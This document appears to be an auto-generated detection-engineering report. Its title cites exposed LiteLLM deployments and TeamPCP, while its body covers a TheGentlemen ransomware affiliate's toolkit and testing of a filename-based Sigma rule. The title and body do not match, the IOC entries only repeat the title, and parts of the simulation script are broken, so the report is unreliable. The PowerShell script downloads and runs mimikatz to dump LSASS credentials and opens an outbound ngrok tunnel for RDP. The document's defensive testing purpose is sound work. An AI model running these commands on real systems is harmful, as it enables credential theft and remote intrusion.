33K Exposed LiteLLM Deployments and the C2 Servers Behind TeamPCP’s Supply Chain Attack
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Researchers discovered an unauthenticated open directory on a Russian bulletproof hosting provider containing a complete ransomware operator toolkit attributed to a TheGentlemen ransomware affiliate. The toolkit includes legitimate utilities, well‑known offensive tools, batch scripts for defense evasion, credential dumping, and remote access, as well as cleartext ngrok tokens. Evidence such as Mimikatz logs confirms active use against real victims.
Investigation
The investigation began by querying previously published IOCs, leading to the open directory at 176.120.22.127:80. Analysts catalogued 126 files, extracted network scanning tools, privilege escalation utilities, defender disabling scripts, credential dumping logs, and persistence mechanisms. Detailed analysis mapped each component to MITRE ATT&CK techniques and highlighted the layered defense‑evasion approach.
Mitigation
Defenders should monitor for execution of known dual‑use tools, registry changes disabling Windows Defender, mass service termination, VSS shadow deletion, and creation of open SMB shares. Blocking outbound connections to the identified IP and ngrok infrastructure, and enforcing application whitelisting and credential guard can reduce impact.
Response
Upon detection, isolate the affected host, collect volatile data, and identify any active ngrok tunnels using the exposed tokens. Remediate registry modifications, restore disabled services, and initiate full incident response procedures including credential rotation and backup restoration.
Attack Flow

```mermaid
graph TB
  %% Class definitions
  classDef action fill:#99ccff
  classDef tool fill:#cccccc
  %% Nodes
  step_active_scanning["<b>Action</b> – <b>T1595 Active Scanning</b><br/><b>Tool</b>: netscan.exe"]
  class step_active_scanning action
  step_system_info["<b>Action</b> – <b>T1082 System Information Discovery</b><br/><b>Tools</b>: systeminfo, route print"]
  class step_system_info action
  step_process_discovery["<b>Action</b> – <b>T1057 Process Discovery</b><br/><b>Tool</b>: PCHunter64"]
  class step_process_discovery action
  step_priv_esc["<b>Action</b> – <b>T1134.003 Access Token Manipulation: Token Impersonation/The Trusted Installer</b><br/><b>Tool</b>: PowerRun impersonates TrustedInstaller"]
  class step_priv_esc action
  step_credential_access["<b>Action</b> – <b>T1003.001 OS Credential Dumping</b><br/><b>Tool</b>: Mimikatz harvests NTLM hashes and usernames"]
  class step_credential_access action
  step_defense_evasion["<b>Action</b> – <b>T1562.001 Impair Defenses: Disable Security Tools</b><br/><b>Tools</b>: dControl.exe, ConfigureDefender.exe"]
  class step_defense_evasion action
  step_modify_registry["<b>Action</b> – <b>T1112 Modify Registry</b><br/><b>Details</b>: registry changes to disable Defender and enable WDigest"]
  class step_modify_registry action
  step_service_stop["<b>Action</b> – <b>T1489 Service Stop</b><br/><b>Scripts</b>: z.bat / z1.bat stop and disable AV, Exchange, DB services"]
  class step_service_stop action
  step_persistence_c2["<b>Action</b> – <b>T1219 Remote Access Software</b> and <b>T1572 Standard Application Layer Protocol</b><br/><b>Tools</b>: ngrok tunnels, RustDesk remote access"]
  class step_persistence_c2 action
  step_inhibit_recovery["<b>Impact</b> – <b>T1490 Inhibit System Recovery</b><br/><b>Command</b>: vssadmin delete shadows"]
  class step_inhibit_recovery action
  step_anti_forensics["<b>Action</b> – <b>T1070.001 Clear Windows Event Logs</b><br/><b>Script</b>: clearlog.bat clears Windows event logs"]
  class step_anti_forensics action
  step_archive_data["<b>Action</b> – <b>T1560 Archive Collected Data</b><br/><b>Tool</b>: 7-Zip compresses data"]
  class step_archive_data action
  %% Connections
  step_active_scanning -->|leads_to| step_system_info
  step_system_info -->|leads_to| step_process_discovery
  step_process_discovery -->|leads_to| step_priv_esc
  step_priv_esc -->|leads_to| step_credential_access
  step_credential_access -->|leads_to| step_defense_evasion
  step_defense_evasion -->|leads_to| step_modify_registry
  step_modify_registry -->|leads_to| step_service_stop
  step_service_stop -->|leads_to| step_persistence_c2
  step_persistence_c2 -->|leads_to| step_inhibit_recovery
  step_inhibit_recovery -->|leads_to| step_anti_forensics
  step_anti_forensics -->|leads_to| step_archive_data
```
Detections
- Disable Windows Defender Realtime Monitoring and Other Preferences Changes (via cmdline)
- Suspicious Registry Modifications to Allow RDP Connections and Create Persistence (via process_creation)
- Possible Remote Desktop Services Shadowing (via process_creation)
- Possible Registry RDP-Specific Artifacts Deletion Attempt (cmdline)
- Add Suspicious Library to the Security Support Providers [SSP] (via registry_event)
- Weak File Share Permissions (via cmdline)
- Windows Defender Preferences Suspicious Changes (via powershell)
- Probable Use of Windows Hacktools [Part3] (via cmdline)
- Possible Accessibility Features via Registry Abuse (via cmdline)
- Suspicious Taskkill Execution (via cmdline)
- Suspicious VSSADMIN Activity (via cmdline)
- Possible Silent Process Exit Mechanism Utilisation (via registry_event)
- Suspicious Ransomware Interfering Service Stoppage (via cmdline)
- Possible Ngrok Download or Initialize Attempt (via cmdline)
- Probable Use of Windows Hacktools [Part3] (via file_event)
- Possible System Process Enumeration (via cmdline)
- Possible Modification of Windows Defender Registry Keys (via registry_event)
- Disabling Windows Defender Protections (via registry_event)
- Possible WDigest Registry Key Abuse (via registry_event)
- Possible Defense Evasion Activity By Suspicious Use of Wevtutil (via cmdline)
- Possible UAC Bypass – UAC Disable Attempt (via registry_event)
- Alternative Remote Access / Management Software (via process_creation)
- IOCs (DestinationIP) to detect: 33K Exposed LiteLLM Deployments and the C2 Servers Behind TeamPCP's Supply Chain Attack
- IOCs (SourceIP) to detect: 33K Exposed LiteLLM Deployments and the C2 Servers Behind TeamPCP's Supply Chain Attack
- Windows Defender Evasion and Credential Dumping via Registry Modifications [Windows Registry Event]
- PowerShell Defender Disabling via Set-MpPreference [Windows Powershell]
- Execution of Known Tools for Privilege Escalation and Remote Access [Windows Process Creation]
## Executive Summary
- Test Case ID: TC-20260330-A1B2C
- TTPs: T1003.001, T1016, T1021.001, T1021.002, T1046, T1057, T1059.003, T1070.001, T1070.004, T1082, T1112, T1134, T1219, T1484.001, T1489, T1490, T1546.008, T1548.002, T1560.001, T1562.001, T1572
- Detection Rule Logic Summary: Detects creation of processes whose executable name ends with any of a curated list of known privilege‑escalation or remote‑access tools (e.g., PowerRun, ngrok, RDP, RustDesk, mimikatz).
- Detection Rule Language/Format: Sigma (YAML)
- Target Security Environment: Windows OS; process‑creation telemetry via Sysmon (Event ID 1) and Windows Security Log (Event 4688); any SIEM/EDR capable of ingesting these events (e.g., Azure Sentinel, Splunk, Elastic).
- Resilience Score (1-5): 2
- Justification: The rule relies solely on exact file‑name matching. An adversary can easily evade it by renaming binaries, using packed variants, or executing the same functionality via built‑in Windows utilities, reducing effectiveness.
- Key Findings: The rule fires reliably when the exact listed binaries are executed, but it fails to detect renamed or functionally equivalent tools, leading to high false‑negative risk.
- Recommendation: Enrich the rule with additional indicators (hashes, command‑line arguments, parent‑process relationships) and broaden coverage to include living‑off‑the‑land binaries that provide equivalent capabilities.
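To make the resilience finding concrete, the following added example (not part of this report or its Sigma rule) models the tested filename-suffix logic beside an enriched variant that also checks command-line arguments and the parent process, then runs both over constructed process-creation events. The tool names and command-line markers are taken from this report's simulation; the parent-process list and the sample events are assumptions for illustration.

```python
from dataclasses import dataclass

# Image names the report says the tested rule keys on (case-insensitive suffix match).
TOOL_IMAGES = ("powerrun_x64.exe", "ngrok.exe", "rdp.exe", "rustdesk.exe", "mimikatz.exe")
# Behavioural indicators taken from the simulated command lines (assumed, illustrative).
CMDLINE_MARKERS = ("privilege::debug", "sekurlsa::", "tcp 3389", "--no-upgrade")
# Scripting parents that rarely spawn remote-access or credential tooling legitimately (assumed).
SUSPICIOUS_PARENTS = ("cmd.exe", "powershell.exe", "wscript.exe")

@dataclass
class ProcessEvent:
    image: str          # Sysmon EID 1 'Image' (full path of the new process)
    command_line: str   # Sysmon 'CommandLine'
    parent_image: str   # Sysmon 'ParentImage'

def name_rule(ev: ProcessEvent) -> bool:
    """Tested logic: fires only when the image name ends with a listed tool name."""
    return ev.image.lower().endswith(TOOL_IMAGES)

def enriched_rule(ev: ProcessEvent) -> bool:
    """Recommended enrichment: also fire on tool-specific arguments spawned by a script host."""
    if name_rule(ev):
        return True
    cmd = ev.command_line.lower()
    marker_hit = any(m in cmd for m in CMDLINE_MARKERS)
    parent_hit = ev.parent_image.lower().endswith(SUSPICIOUS_PARENTS)
    return marker_hit and parent_hit

def evaluate(events):
    """Map each event's image basename to (name_rule fired, enriched_rule fired)."""
    return {ev.image.rsplit("\\", 1)[-1]: (name_rule(ev), enriched_rule(ev)) for ev in events}

# Constructed sample telemetry (not real logs): benign, listed name, renamed tool, ngrok as-is.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\notepad.exe", "notepad.exe", r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Users\u\AppData\Local\Temp\PowerRun_x64.exe",
                 "PowerRun_x64.exe privilege::debug sekurlsa::logonpasswords exit", PS),
    # Same binary under an innocuous name: only the enriched rule catches it.
    ProcessEvent(r"C:\Users\u\AppData\Local\Temp\svc_update.exe",
                 "svc_update.exe privilege::debug sekurlsa::logonpasswords exit",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Users\u\AppData\Local\Temp\ngrok.exe", "ngrok.exe tcp 3389 --log=stdout", PS),
]

if __name__ == "__main__":
    for name, (by_name, enriched) in evaluate(SAMPLE_EVENTS).items():
        print(f"{name:18} name_rule={by_name!s:5} enriched_rule={enriched}")
```

The renamed event is the false negative the Justification describes: the filename rule misses it while the command-line and parent-process enrichment still fires.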
## Simulation Environment & Context
- TTPs Under Test:
  - T1003.001: OS Credential Dumping – LSASS Memory
  - T1016: System Network Configuration Discovery
  - T1021.001: Remote Services – Remote Desktop Protocol (RDP)
  - T1021.002: Remote Services – SMB/Windows Admin Shares
  - T1046: Network Service Scanning
  - T1057: Process Discovery
  - T1059.003: Command & Scripting Interpreter – Windows Command Shell
  - T1070.001: Indicator Removal on Host – Clear Windows Event Logs
  - T1070.004: Indicator Removal on Host – File Deletion
  - T1082: System Information Discovery
  - T1112: Modify Registry
  - T1134: Access Token Manipulation
  - T1219: Remote Access Tools
  - T1484.001: Domain Policy Modification – Group Policy Modification
  - T1489: Service Stop
  - T1490: Inhibit System Recovery
  - T1546.008: Event Triggered Execution – PowerShell
  - T1548.002: Abuse Elevation Control Mechanism – Bypass UAC
  - T1560.001: Archive Collected Data – Archive via Utility
  - T1562.001: Impair Defenses – Disable Security Tools
  - T1572: Protocol Tunneling
- TTP Context & Relevance: The rule targets the execution of binaries historically associated with the listed techniques (e.g., mimikatz for T1003.001, ngrok for T1572, RustDesk for T1219). By reproducing these executions we can validate whether the detection fires as intended and assess how renaming or alternative tooling affects detection.
- Target Environment:
  - OS: Windows 10/Server 2019 (64‑bit)
  - Logging: Sysmon (v13+) with default process‑creation configuration; Windows Security Event Log (Event 4688) enabled.
  - Security Stack: Azure Sentinel (Kusto Query Language) – interchangeable with Splunk, Elastic, etc.
## Telemetry & Baseline Pre‑flight Check
Rationale: Before simulating the attack, we must confirm that the target host is configured to generate the necessary logs, that these logs are ingested by the SIEM, and that the detection rule does not fire on benign activity. Without this validation, any test outcome is unreliable.
1. Telemetry Configuration Instructions:
   - Install Sysmon (if not already present) and apply a configuration that logs Process Create events (EventID 1).

     ```powershell
     # Download and install Sysmon (default configuration logs Process Create, EventID 1)
     Invoke-WebRequest -Uri https://download.sysinternals.com/files/Sysmon.exe -OutFile "$env:TEMP\sysmon.exe"
     & "$env:TEMP\sysmon.exe" -i -accepteula
     ```

   - Verify that Windows Security Auditing for "Audit Process Creation" (Event 4688) is enabled via Group Policy or Local Security Policy.
   - Ensure the SIEM connector is active and forwarding both Sysmon and Security logs to the chosen workspace.
2. Ingestion & Baseline Validation:
   - Action (Benign Telemetry): Execute a common Windows binary that is not part of the detection list but still generates a process‑creation event.

     ```powershell
     # Benign command – launch Notepad (should not trigger the rule)
     Start-Process notepad.exe
     ```

   - Validation Query (Ingestion): Confirm the Notepad event appears in the SIEM.

     ```kusto
     // Azure Sentinel KQL – verify ingestion of the benign process
     // SecurityEvent exposes the parent as ParentProcessName (InitiatingProcessFileName belongs to the Defender DeviceProcessEvents schema)
     SecurityEvent
     | where EventID == 4688
     | where Process == "notepad.exe"
     | project TimeGenerated, Computer, Process, CommandLine, ParentProcessName
     | limit 10
     ```
## Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
- Attack Narrative & Commands:
  - Credential Dumping (T1003.001): The attacker copies `mimikatz.exe` to the victim host, renames it to `PowerRun_x64.exe` (to match the rule's filename list) and executes it to extract LSASS credentials.
  - Reverse Tunnel Creation (T1572): The attacker launches `ngrok.exe` (as is) to open a TCP tunnel that forwards a local RDP port to the attacker's server, facilitating lateral movement.
  - Remote Desktop Session (T1021.001): Using the newly created tunnel, the attacker runs `rdp.exe` to open a remote desktop connection to a second internal host.
  - Alternative Remote Access (T1219): As a fallback, `rustdesk.exe` is started to establish a persistent remote‑access channel.

  Each of these executions produces a Sysmon/Event 4688 record with the `Image` field ending in the respective executable name, satisfying the detection condition.
- Regression Test Script:

  ```powershell
  <#
  Simulation script to trigger the "Known Tools for Privilege Escalation and Remote Access" rule.
  Prerequisites:
    - Sysmon & Security Event Auditing enabled.
    - Current user has sufficient rights to execute the binaries.
  #>
  # 1. Deploy mimikatz and rename to PowerRun_x64.exe (matches rule)
  $mimikatzUrl = "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0/mimikatz_trunk.zip"
  $tempPath = "$env:TEMP\mimikatz"
  New-Item -ItemType Directory -Path $tempPath -Force | Out-Null
  Invoke-WebRequest -Uri $mimikatzUrl -OutFile "$tempPath\mimikatz.zip"
  Expand-Archive -Path "$tempPath\mimikatz.zip" -DestinationPath $tempPath -Force
  Copy-Item -Path "$tempPath\mimikatz\x64\mimikatz.exe" -Destination "$env:TEMP\PowerRun_x64.exe" -Force
  # Execute renamed mimikatz (credential dumping)
  Write-Host "[*] Executing renamed mimikatz (PowerRun_x64.exe) for credential dumping..."
  Start-Process -FilePath "$env:TEMP\PowerRun_x64.exe" -ArgumentList "privilege::debug sekurlsa::logonpasswords exit" -WindowStyle Hidden -Wait
  # 2. Download and run ngrok (reverse tunnel)
  $ngrokUrl = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip"
  Invoke-WebRequest -Uri $ngrokUrl -OutFile "$tempPath\ngrok.zip"
  Expand-Archive -Path "$tempPath\ngrok.zip" -DestinationPath $tempPath -Force
  $ngrokPath = "$tempPath\ngrok.exe"
  Write-Host "[*] Starting ngrok TCP tunnel on port 3389..."
  Start-Process -FilePath $ngrokPath -ArgumentList "tcp 3389 --log=stdout" -RedirectStandardOutput "$tempPath\ngrok.log" -NoNewWindow
  # 3. Launch RDP client through the tunnel (simulated)
  Write-Host "[*] Simulating RDP connection via tunnel (rdp.exe)..."
  $rdpPath = "$tempPath\rdp.exe"
  # Create a dummy rdp.exe (just to generate the process name)
  New-Item -ItemType File -Path $rdpPath -Force | Out-Null
  Start-Process -FilePath $rdpPath -WindowStyle Hidden
  # 4. Deploy RustDesk as fallback remote access tool
  $rustdeskUrl = "https://github.com/rustdesk/rustdesk/releases/download/1.1.9/rustdesk-1.1.9-windows-x64.zip"
  Invoke-WebRequest -Uri $rustdeskUrl -OutFile "$tempPath\rustdesk.zip"
  Expand-Archive -Path "$tempPath\rustdesk.zip" -DestinationPath $tempPath -Force
  $rustdeskPath = "$tempPath\rustdesk.exe"
  Write-Host "[*] Starting RustDesk (fallback remote access)..."
  Start-Process -FilePath $rustdeskPath -ArgumentList "--no-upgrade" -WindowStyle Hidden
  Write-Host "[+] Simulation complete. Check the SIEM for process creation events ending with the listed binaries."
  ```
- Cleanup Commands:

  ```powershell
  # Terminate ngrok tunnel
  Get-Process -Name ngrok -ErrorAction SilentlyContinue | Stop-Process -Force
  # Remove temporary files and binaries
  Remove-Item -Path "$env:TEMP\PowerRun_x64.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMP\ngrok.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMP\rdp.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMP\rustdesk.exe" -Force -ErrorAction SilentlyContinue
  # Directories that were never created are skipped rather than raising an error
  Remove-Item -Recurse -Force -Path "$env:TEMP\mimikatz", "$env:TEMP\ngrok", "$env:TEMP\rustdesk" -ErrorAction SilentlyContinue
  Write-Host "[*] Cleanup completed."
  ```